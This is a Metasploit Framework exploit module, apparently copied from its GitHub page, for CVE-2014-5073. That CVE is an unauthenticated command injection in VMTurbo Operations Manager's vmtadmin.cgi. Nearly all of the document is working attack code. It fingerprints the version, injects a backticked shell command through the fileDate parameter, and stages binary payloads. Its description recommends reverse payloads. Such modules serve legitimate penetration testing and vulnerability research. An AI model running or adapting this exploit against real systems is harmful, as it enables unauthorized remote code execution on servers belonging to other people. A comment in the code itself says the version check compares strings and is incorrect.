Path: blob/master/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
19591 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::CmdStager10include Msf::Exploit::EXE1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution',17'Description' => %q{18VMTurbo Operations Manager 4.6 and prior are vulnerable to unauthenticated19OS Command injection in the web interface. Use reverse payloads for the most20reliable results. Since it is a blind OS command injection vulnerability,21there is no output for the executed command when using the cmd generic payload.22Port binding payloads are disregarded due to the restrictive firewall settings.2324This module has been tested successfully on VMTurbo Operations Manager versions 4.5 and254.6.26},27'Author' => [28# Secunia Research - Discovery and Metasploit module29'Emilio Pinna <emilio.pinn[at]gmail.com>'30],31'License' => MSF_LICENSE,32'References' => [33['CVE', '2014-5073'],34['OSVDB', '109572'],35['URL', 'http://web.archive.org/web/20140905004331/http://secunia.com:80/secunia_research/2014-8/']36],37'DisclosureDate' => '2014-06-25',38'Privileged' => false,39'Platform' => %w{linux unix},40'Payload' => {41'Compat' =>42{43'ConnectionType' => '-bind'44}45},46'Targets' => [47[48'Unix CMD',49{50'Arch' => ARCH_CMD,51'Platform' => 'unix'52}53],54[55'VMTurbo Operations Manager',56{57'Arch' => [ ARCH_X86, ARCH_X64 ],58'Platform' => 'linux'59}60],61],62'DefaultTarget' => 1,63'Notes' => {64'Reliability' => UNKNOWN_RELIABILITY,65'Stability' => UNKNOWN_STABILITY,66'SideEffects' => UNKNOWN_SIDE_EFFECTS67}68)69)7071deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')72end7374def check75begin76res = send_request_cgi({77'method' => 'GET',78'uri' => "/cgi-bin/vmtadmin.cgi",79'vars_get' => {80"callType" => "ACTION",81"actionType" => "VERSIONS"82}83})84rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout85vprint_error("Failed to connect to the web server")86return Exploit::CheckCode::Unknown87end8889if res and res.code == 200 and res.body =~ /vmtbuild:([\d]+),vmtrelease:([\d.]+),vmtbits:[\d]+,osbits:[\d]+/90version = $291build = $19293vprint_status("VMTurbo Operations Manager version #{version} build #{build} detected")94else95vprint_status("Unexpected vmtadmin.cgi response")96return Exploit::CheckCode::Unknown97end9899# NOTE (@todb): This PHP style comparison seems incorrect, since100# strings are being compared and not numbers. Example:101# 1.9.3p547 :001 > a = "4.6"102# => "4.6"103# 1.9.3p547 :002 > b = "10.6"104# => "10.6"105# 1.9.3p547 :003 > a <= b106#107# Also, the description says 4.5 is also vuln. This doesn't108# appear to care.109if version and version <= "4.6" and build < "28657"110return Exploit::CheckCode::Appears111else112return Exploit::CheckCode::Safe113end114end115116def execute_command(cmd, opts)117begin118res = send_request_cgi({119'uri' => '/cgi-bin/vmtadmin.cgi',120'method' => 'GET',121'vars_get' => {122"callType" => "DOWN",123"actionType" => "CFGBACKUP",124"fileDate" => "\"`#{cmd}`\""125}126})127rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout128vprint_error("Failed to connect to the web server")129return nil130end131132vprint_status("Sent command #{cmd}")133end134135def exploit136# Handle single command shot137if target.name =~ /CMD/138cmd = payload.encoded139res = execute_command(cmd, {})140141unless res142fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")143end144145print_status("Blind Exploitation - unknown exploitation state")146return147end148149# Handle payload upload using CmdStager mixin150execute_cmdstager({ :flavor => :printf })151end152end153154155